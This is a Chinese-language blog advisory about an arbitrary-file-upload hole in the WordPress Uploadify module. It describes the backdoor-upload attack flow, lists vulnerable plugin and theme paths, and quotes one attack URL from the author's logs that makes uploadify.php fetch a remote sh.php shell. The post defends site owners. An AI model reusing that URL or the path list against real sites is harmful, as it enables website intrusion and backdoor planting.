WordPress Uploadify 外掛漏洞

被駭了還不知道是誰嗎？

從上個月底開始又一波WordPress網站被駭，而這些被駭的網站照理講應該要有一些共同的點，但是好像又說不上來是不是這樣，因為有人手上有好幾個站放在同一台主機，也不是每個站都被駭！

而最慘的是這些網站被駭了之後，只會用備份的檔案蓋回去（如果有的話），或是用重新安裝WordPress，這樣子似乎是可以讓網站恢復正常，但是實際上呢？

有被駭的人應該就知道漏洞沒堵住，過沒多久一樣的症狀又跑出來了，這就好像人會生病一樣：沒有找出真正致病的原因，是不可能根治的！

Uploadify外掛

Uploadify這個外掛是利用jQuery來上傳檔案的外掛，有許多的外掛都會用到它，這就跟之前高登提過出問題的TimThumb外掛一樣，不只是單一的外掛會用到，而是有許多外掛都有用到這個模組

而這種很多人用的模組出現漏洞時就是駭客大展身手的時機，因為只要寫一個程式經由以下的流程就可以駭你的網站：

• 以特定的網址測試你的網站是不是有這個外掛模組
• 有的話利用這個外掛上傳一個後門PHP程式到你的網站
• 再由遠端執行這個後門程式就可以將木馬程式植入他想植入的檔案
• 最後就是你網站的訪客被轉走或是也被本植入木馬變成殭屍網路的成員

警告早已發出

而事實上早在今年的４月份就有關於Uploadify這個模組的安全警示被公布：

• Reflected XSS in Uploadify Integration WordPress plugin

你沒注意到？沒關係！駭客會讓你注意到，而且保證讓你印象深刻！

但是我們現在到WordPress官網用Uploadify Integration這個名稱搜索卻找不到這個外掛？！

<div "text-align="center"">

研判應該是被WordPress官方移除了，但是跟TimThumb模組一樣，還是有許多外掛及版型會用到這個模組，而漏洞就是這樣產生的，像是有人在我網站用這樣一串網址在試：

• /wp-content/themes/zcool-like/uploadify.php?src=http://blogger.com.antarticachilena.cl/sh.php

這樣可以看出zcool-like這個版型也有用這個外掛

含有Uploadify.php的外掛

以下是網友熱心整理出來的清單

• /plugins/1-flash-gallery/
• /plugins/annonces/ (Version 1.2.0.1 and older)
• /plugins/apptivo-business-site/
• /plugins/bulletproof-security/ (versions prior to 2/11/2011)
• /plugins/chillybin-competition/
• /plugins/comments_plugin/
• /plugins/doptg/
• /plugins/foxypress/ (Version 0.4.2.1 and older)
• /plugins/gpress/
• /plugins/html5avmanager/
• /plugins/image-symlinks/
• /plugins/kish-multi/
• /plugins/lbg-vp2-html5-bottom/
• /plugins/motorcycle-inventory/
• /plugins/nmedia-user-file-uploader/
• /plugins/pods/
• /plugins/qr-color-code-generator-basic/
• /plugins/squace-mobile-publishing-plugin-for-wordpress/
• /plugins/wordpress-member-private-conversation/
• /plugins/wp-crm/
• /plugins/wp-property/
• /plugins/wp-symposium/
• /plugins/wpmarketplace/
• /plugins/uploader/
• /plugins/uploadify/ (Version 3.0 and older)
• /plugins/very-simple-post-images/

含有Uploadify.php的版型

• /themes/aim-theme/ (Aim)
• /themes/deep-blue/ (Deep Blue, Version 1.9.2 and older)
• /themes/famous/ (Famous, Version 2.0.5 and older)
• /themes/fresh_trailers/ (Fresh Trailer)
• /themes/fresh_trailers_v2/ (Fresh Trailer V 2.0)
• /themes/pronto/ (Pronto)
• /themes/u-design (U-Design, Versions prior to 1.6.1)
• /themes/wp-eden/ (WP Eden)
• /themes/wpnavigator/ (The Navigator)
• /themes/zcool-like/

參考來源：IT Pixie: WordPress Exploit Alert: Uploadify.php

請有用WordPress架站的一定要仔細看清楚，如果有新發現的外掛或版型也歡迎回報

在我發出上一篇TimThumb的警告之後，我的網站就招來了一堆網路上搜尋相關版型外掛名稱而來的小人（SEO作太好的下場，笑！）

本來想說自身的安全比較重要不想再當好人了，但是發覺好像已經被列入參考名單之中，所以想要低調已經是不可能。不過幾個月來認真的研究他們的手法，所以已經能夠有效阻擋惡意訪客，就把它當成在打怪練功吧！

補充：

才發完文又看到兩個外掛有類似的漏洞

• WordPress Cimy User Extra Fields Plugin Arbitrary File Upload Vulnerability
• WordPress Nmedia Users File Uploader Plugin Arbitrary File Upload Vulnerability

請慎選外掛才能避免這一類的危險